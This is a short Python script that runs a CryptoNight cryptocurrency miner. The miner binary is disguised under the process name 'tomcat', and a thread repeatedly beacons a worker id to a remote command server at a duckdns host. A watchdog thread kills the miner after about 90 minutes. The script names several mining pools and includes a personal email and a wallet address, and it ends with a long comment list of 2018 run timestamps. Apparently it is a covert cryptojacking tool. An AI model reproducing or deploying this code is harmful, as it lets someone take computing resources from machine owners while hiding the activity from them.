import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:22:01.979425
#2018-02-17 16:08:05.622967
#2018-02-17 17:57:04.215137
#2018-02-17 19:45:07.589255
#2018-02-17 21:32:05.383898
#2018-02-17 23:16:08.477436
#2018-02-18 01:03:07.328418
#2018-02-18 02:51:06.045357
#2018-02-18 04:41:03.657944
#2018-02-18 06:33:01.944421
#2018-02-18 08:20:07.405805
#2018-02-18 10:08:07.983901
#2018-02-18 11:54:07.138317
#2018-02-18 13:39:03.994034
#2018-02-18 15:29:06.885933
#2018-02-18 17:18:05.144448
#2018-02-18 19:07:06.743574
#2018-02-18 20:53:01.308209
#2018-02-18 22:38:07.135038
#2018-02-19 00:27:04.938324
#2018-02-19 02:12:05.059855
#2018-02-19 03:58:04.380373
#2018-02-19 05:43:06.140342
#2018-02-19 07:31:04.015305
#2018-02-19 09:21:02.171022
#2018-02-19 11:10:09.451978
#2018-02-19 12:58:07.421960
#2018-02-19 14:45:06.601436
#2018-02-19 16:33:05.131419
#2018-02-19 18:18:08.488690
#2018-02-19 20:06:04.581854
#2018-02-19 21:53:07.580783
#2018-02-19 23:39:08.257623
#2018-02-20 01:27:06.557411
#2018-02-20 03:17:03.745723
#2018-02-20 05:06:05.332597
#2018-02-20 06:49:01.330851
#2018-02-20 08:35:01.391381
#2018-02-20 10:19:06.028221
#2018-02-20 12:04:06.096405
#2018-02-20 13:51:06.759452
#2018-02-20 15:37:01.821080
#2018-02-20 17:23:06.312092
#2018-02-20 19:13:08.946793
#2018-02-20 21:01:07.803267
#2018-02-20 22:47:07.850408
#2018-02-21 00:28:02.123779
#2018-02-21 02:14:06.789040
#2018-02-21 04:02:07.052099
#2018-02-21 05:49:05.977816
#2018-02-21 07:36:03.983205
#2018-02-21 09:21:08.327883
#2018-02-21 11:09:05.153957
#2018-02-21 12:56:08.678944
#2018-02-21 14:45:13.896658
#2018-02-21 16:33:05.650810
#2018-02-21 18:23:01.961888
#2018-02-21 20:10:04.444233
#2018-02-21 21:58:08.525737
#2018-02-21 23:45:09.178250
#2018-02-22 01:37:05.851720
#2018-02-22 03:26:06.070781
#2018-02-22 05:14:04.634751
#2018-02-22 06:57:01.800165
#2018-02-22 08:44:06.450878
#2018-02-22 10:33:01.822413
#2018-02-22 12:18:09.304998
#2018-02-22 14:04:05.356408
#2018-02-22 15:52:05.368684
#2018-02-22 17:39:06.450992
#2018-02-22 19:25:09.735624
#2018-02-22 21:16:08.990156
#2018-02-22 23:01:05.794546
#2018-02-23 00:47:01.515627
#2018-02-23 02:35:08.582758
#2018-02-23 04:24:06.657637
#2018-02-23 06:11:05.954945
#2018-02-23 07:56:08.020773
#2018-02-23 09:53:06.366670
#2018-02-23 11:57:05.152316
#2018-02-23 13:45:08.279338
#2018-02-23 15:35:04.813206
#2018-02-23 17:23:05.602412
#2018-02-23 19:09:05.946878
#2018-02-23 20:54:03.817500
#2018-02-23 22:40:07.786092
#2018-02-24 00:28:07.576489
#2018-02-24 02:20:07.781854
#2018-02-24 04:09:05.560766
#2018-02-24 05:57:01.336178
#2018-02-24 07:46:03.734641
#2018-02-24 09:32:05.310373
#2018-02-24 11:25:07.560195
#2018-02-24 13:15:01.555813
#2018-02-24 15:06:05.303407
#2018-02-24 16:55:03.716791
#2018-02-24 18:43:07.475985
#2018-02-24 20:34:07.044744
#2018-02-24 22:37:01.608596
#2018-02-25 01:44:04.956291
#2018-02-25 04:54:01.460255
#2018-02-25 08:27:01.362298